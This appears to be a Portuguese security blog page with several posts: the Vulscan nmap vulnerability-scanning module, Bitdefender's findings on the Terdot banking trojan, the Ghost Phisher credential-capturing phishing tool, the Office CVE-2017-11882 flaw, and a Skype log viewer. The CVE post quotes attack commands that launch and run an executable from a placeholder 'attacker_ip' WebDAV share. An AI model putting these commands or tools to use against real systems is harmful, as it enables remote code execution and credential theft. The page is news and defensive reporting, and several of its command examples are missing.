e-forense - Análise Forense Computacional, Hacking, Segurança & Código

O Vulscan é um módulo que aumenta as capacidades do nmap para realizar scans de vulnerabilidades.



A opção nmap -sV permite a detecção de versão por serviço, que é usada para determinar possíveis falhas de acordo com o produto identificado. Os dados são pesquisados numa versão offline do VulDB.

Até ao momento as bases de dados seguintes vêm pré-instaladas:

• scipvuldb.csv
• cve.csv
• osvdb.csv
• securityfocus.csv
• securitytracker.csv
• xforce.csv
• expliotdb.csv
• openvas.csv

Instalação:

Para instalar basta copias os ficheiros para a pasta:

Utilização:

Para executar o comando mais básico e iniciar um scan de vulnerabilidade simples basta:

Download & Links úteis:

Investigadores de segurança informática descobriram uma nova e sofisticada forma de malware baseada no notório trojan bancário Zeus que rouba mais do que apenas detalhes de contas bancárias.



Conhecido por Terdot, o trojan bancário existe desde meados de 2016 e inicialmente foi desenhado para operar como um proxy para conduzir ataques Man-in-the-Middle (MitM), roubar informações de navegação, tais como informações de cartões de crédito armazenados e credenciais de login e ainda injetar código HTML malicioso nas páginas web visitadas.

Contudo, investigadores da empresa de segurança informática Bitdefender descobriram que o trojan bancário agora foi renovado com novas capacidades de espionagem, como alavancar ferramentas open source para spoofing de certificados SSL por forma a obter acesso a redes sociais e contas de e-mail e até mesmo publicar em nome dos utilizadores infectados.

Terdot faz isso utilizando um MitN proxy altamente personalizado que permite ao malware interceptar qualquer tráfego num computador infectado.

Além disso, a nova variante do Terdot adicionou recursos de atualização automática que permitem que o malware faça download e execute arquivos conforme solicitado pelo operador.

Normalmente, Terdot visava sites de instituições bancárias do Canada, como o Royal Bank, Banque Nationale, PCFinancial, Desjardins, BMO (Banco de Montreal) e a Scotiabank, entre outros.

No entanto, de acordo com análises mais recentes, o Terdot pode visar redes sociais, incluindo Facebook, Twitter, Google Plus e YouTube, mas também serviços de e-mail, incluindo o Gmail, o Live, Hotmail, Outlook e o Yahoo Mail.

Curiosamente, o malware evita a recolha de dados relacionados à rede social maior da Rússia, VKontakte (vk.com), observou a Bitdefender. Isso sugere que quem poderá estar por trás desta nova variante do malware sejam atores da Europa Oriental.

O trojan está a ser distribuído principalmente por sites comprometidos através do SunDown Exploit Kit, mas também já foi observado a sua distribuição através de emails maliciosos que imitam um PDF.

Ao clicar no PDF, o trojan executa código JavaScript obfuscado que posteriormente faz o download e executa o arquivo de malware. A fim de evadir a detecção ele usa uma cadeia complexa de droppers, injeções e downloaders que permitem o download de Terdot aos pedaços.

Uma vez infectado, o trojan infiltra-se no processo do navegador para redirecionar as ligações através da sua própria web proxy, sniffar o tráfego e injetar spyware. Também pode roubar informações de autenticação inspecionando os pedidos da vítima ou injetando código spyware em Javascript nas respostas.

Terdot também pode ignorar as restrições impostas pelo TLS (Transport Layer Security) ao gerar a sua própria Autoridade de Certificação (CA) e gerar certificados para cada domínio que a vítima visita.

Todos os dados que as vítimas enviam para uma conta bancária ou redes sociais puderam ser interceptados e modificados pelo Terdot em tempo real, o que também pode permitir que ele se espalhe ao publicar links falsos em outras contas de redes sociais.

A Bitdefender tem vindo a acompanhar a nova variante do Terdot desde que este ressurgiu em outubro do ano passado.

Para mais detalhes sobre a nova ameaça, existe um documento técnico publicado pela Bitdefender.

Ghost Phisher é uma ferramenta para auditoria de segurança em redes sem fio e por ethernet escrita em Python e usa a biblioteca Python Qt GUI para o interface, o programa é capaz de emular pontos de acesso e permite implementar vários tipos de servidores de rede internos para redes, testes de penetração e ataques de phising.


A ferramenta vem com um servidor DNS falso, servidor DHCP falso, servidor HTTP falso e também possui uma área integrada para captura automática e registro de credenciais do método de formulário HTTP para uma base de dados. Pode ser usado como honey pot e também pode ser usado para solicitações de DHCP, pedidos de DNS ou ataques de phishing.

Características do Ghost Phisher:

• Servidor HTTP
• Servidor DNS RFC 1035
• Servidor DHCP RFC 2131
• Alojamento web e captura de credenciais (Phishing)
• Emulador de ponto de acesso WIFI
• Sequestro de sessão (modos passivo e ethernet)
• ARP Cache Poisoning (MITN e DoS)
• Penetração usando ligações ao Metasploit
• Registo automático de credenciais numa base de dados SQlite
• Suporte de atualizações

 Pré-requisitos:

As seguintes dependências podem ser instaladas usando o comando do instalador de pacotes do Debian em sistemas baseados em Debian utilizando "apt-get install program" ou de outra forma fazendo o download e instalando manualmente.

• Aircrack-NG
• Python-Scapy
• Python Qt4
• Python
• Subversion
• Xterm
• Metasploit Framework 

Quando o mundo ainda está a recuperar da ameaça do recurso não corrigido DDE no pacote Microsoft Office, os investigadores descobriram mais um problema sério com outro componente do Office, este permite alguém malicioso instalar remotamente malware.

A vulnerabilidade é um problema de corrupção de memória que reside em todas as versões do Microsoft Office lançados nos últimos 17 anos, incluindo o Microsoft Office 365, e funciona contra todas as versões do sistema operacional Windows, incluindo a atualização mais recente Microsoft Windows 10 Creators.

Descoberto por investigadores de segurança da empresa Embedi, a vulnerabilidade leva à execução de código remoto, permitindo que um hacker remoto não autenticado execute código malicioso num sistema específico sem exigir a interação do utilizador depois deste abrir um documento mal-intencionado.

A vulnerabilidade, foi identificada como CVE-2017-11882, e reside no ficheiro executável EQNEDT32.EXE, um componente do MS Office responsável pela inserção e edição de equações (objetos OLE) nos documentos.



No entanto, devido a operações inadequadas de memória, o componente não processa adequadamente objetos na memória, corrompendo-o de tal forma que o hacker consegue executar código malicioso como o utilizador.

À dezassete anos atrás, o EQNEDT32.EXE foi introduzido no Microsoft Office 2000 e foi mantido em todas as versões lançadas após o Microsoft Office 2007, para garantir a retrocompatibilidade entre documentos de versões mais antigas.

DEMONSTRAÇÃO: Vulnerabilidade permite controlo total de um sistema

Esta vulnerabilidade exige a abertura de um arquivo malicioso especialmente criado com uma versão afetada do software Microsoft Office ou Microsoft WordPad.

Pode assumir o controlo total de um sistema quando combinado com as vulnerabilidades de elevação de privilégios do kernel do Windows (como o CVE-2017-11847).

Um cenário possível:

Ao explicar o alcance da vulnerabilidade, os investigadores da Embedi sugeriram vários cenários possíveis:

"Ao inserir vários objetos OLE que exploraram a vulnerabilidade descrita, foi possível executar uma sequência arbitrária de comandos (por exemplo, fazer download de um arquivo da Internet e executá-lo)".

"Uma das maneiras mais fáceis de executar código arbitrário é usar um arquivo executável de um servidor WebDAV comprometido ".

"No entanto, um hacker também pode usar a vulnerabilidade para executar os comandos shell como cmd.exe / c start \\ attacker_ip \ ff. Este comando pode ser utilizado para iniciar um WebClient".

"Depois disso, o hacker pode correr um executável do servidor WebDAV usando o comando \\ attacker_ip \ ff \ 1.exe.".

Como proteger contra esta vulnerabilidade:

Com o lançamento do Patch deste mês, a Microsoft abordou esta vulnerabilidade ao alterar a forma como o software afetado lida com os objetos na memória.

Portanto, os utilizadores são fortemente recomendados para aplicar os patches de segurança de novembro o mais rápido possível para evitar que hackers e ciber criminosos tomem controlo dos seus computadores.

Uma vez que este componente tem uma série de problemas de segurança que podem ser facilmente explorados, desativá-lo pode ser a melhor maneira de garantir a segurança dos seus sistemas.

Os utilizadores podem executar o seguinte comando shell para desabilitar o registo do componente no Windows Registry:

Para 32-Bits:



Para 64-Bits:



Além disso, os utilizadores também devem ativar Protected View (Microsoft Office sandbox) para evitar a execução de conteúdo ativo (OLE / ActiveX / Macro).

A ferramenta Skype Log Viewer permite que o utilizador faça o download e visualize o histórico e os arquivos de log de uma conta de Skype em Windows, sem ter de utilizar o próprio cliente Skype.

O que o Skype Log Viewer faz?

Este programa permite visualizar todos os seus logs de conversas do Skype e, em seguida, exportá-los facilmente como arquivos de texto. Também os organiza correctamente por conversa e garante que as conversas de grupo não se confundem com conversas de um para um.

Este projecto é open source e de uso livre, ao longo dos tempos tem sofrido actualizações, sendo a ultima versão de Abril de 2017.

Para quem faz análise forense digital, esta é uma ferramenta para ter em carteira!

Características do Skype Log Viewer:

• Download dos logs do Skype
• Suporte para base de dados corrumpida
• Possibilidade para vários formatos de exportação
• Organiza por conversas

Pode fazer o download do Skype Log Viewer aqui:

Versão compilada: SkypeLogViewerLGGv1.3.exe
Versão código fonte: skype-log-viewer-v1.3.zip

Pode ler mais sobre o projecto na página de github.